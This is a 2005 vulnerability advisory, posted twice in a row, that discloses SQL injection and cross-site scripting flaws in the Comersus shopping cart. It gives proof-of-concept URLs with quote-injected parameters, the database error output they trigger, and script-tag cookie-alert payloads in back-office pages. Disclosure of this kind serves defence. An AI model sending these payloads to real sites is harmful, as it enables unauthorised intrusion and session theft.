******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO DCRAB (at) HACKERSCENTER (dot) COM [email concealed]
******************************
Get Dcrab's Services to audit your Web servers, scripts, networks, etc or even code them. Learn more at http://www.dbtech.org
Severity: High
Title: Comersus shopping cart has multiple Sql injection and Cross Site Scripting vulnerabilities
Date: 8/07/2005
Vendor: Comersus
Vendor Website: http://www.comersus.com
Vendor Status: Contacted but no reply
Summary: There are, multiple sql injection and cross site scripting vulnerabilities in Comersus Shopping Cart
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'idProduct=''.
/comersus6/includes/databaseFunctions.asp, line 39
http://www.comersus.com/comersus6/store/comersus_optReviewReadExec.asp?i
dProduct='&description=Dr%252E%2BSolomon%2560s%2BVirex%2B6%252E0%2B%2528
For%2BMacintosh%2529
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'idProduct=''.
/comersus6/includes/databaseFunctions.asp, line 39
www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_listA
ssignedPricesToCustomer.asp?idCustomer=7&name=><script>alert(document.co
okie);</script>
Cross Site Scripting
www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_messa
ge.asp?message=><script>alert(document.cookie);</script>
Cross Site Scripting
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my soon to come out book on Secure coding with php.
http://www.dbtech.org
Deadbolt Computer Technologies
******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO DCRAB (at) HACKERSCENTER (dot) COM [email concealed]
******************************
Get Dcrab's Services to audit your Web servers, scripts, networks, etc or even code them. Learn more at http://www.dbtech.org
Severity: High
Title: Comersus shopping cart has multiple Sql injection and Cross Site Scripting vulnerabilities
Date: 8/07/2005
Vendor: Comersus
Vendor Website: http://www.comersus.com
Vendor Status: Contacted but no reply
Summary: There are, multiple sql injection and cross site scripting vulnerabilities in Comersus Shopping Cart
Proof of Concept Exploits:
www.comersus.com/comersus6/store/comersus_optAffiliateRegistrationExec.a
sp?name=1&email='&Submit=Join%20now%21
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'idProduct=''.
/comersus6/includes/databaseFunctions.asp, line 39
http://www.comersus.com/comersus6/store/comersus_optReviewReadExec.asp?i
dProduct='&description=Dr%252E%2BSolomon%2560s%2BVirex%2B6%252E0%2B%2528
For%2BMacintosh%2529
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'idProduct=''.
/comersus6/includes/databaseFunctions.asp, line 39
www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_listA
ssignedPricesToCustomer.asp?idCustomer=7&name=><script>alert(document.co
okie);</script>
Cross Site Scripting
www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_messa
ge.asp?message=><script>alert(document.cookie);</script>
Cross Site Scripting
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my soon to come out book on Secure coding with php.
[ reply ]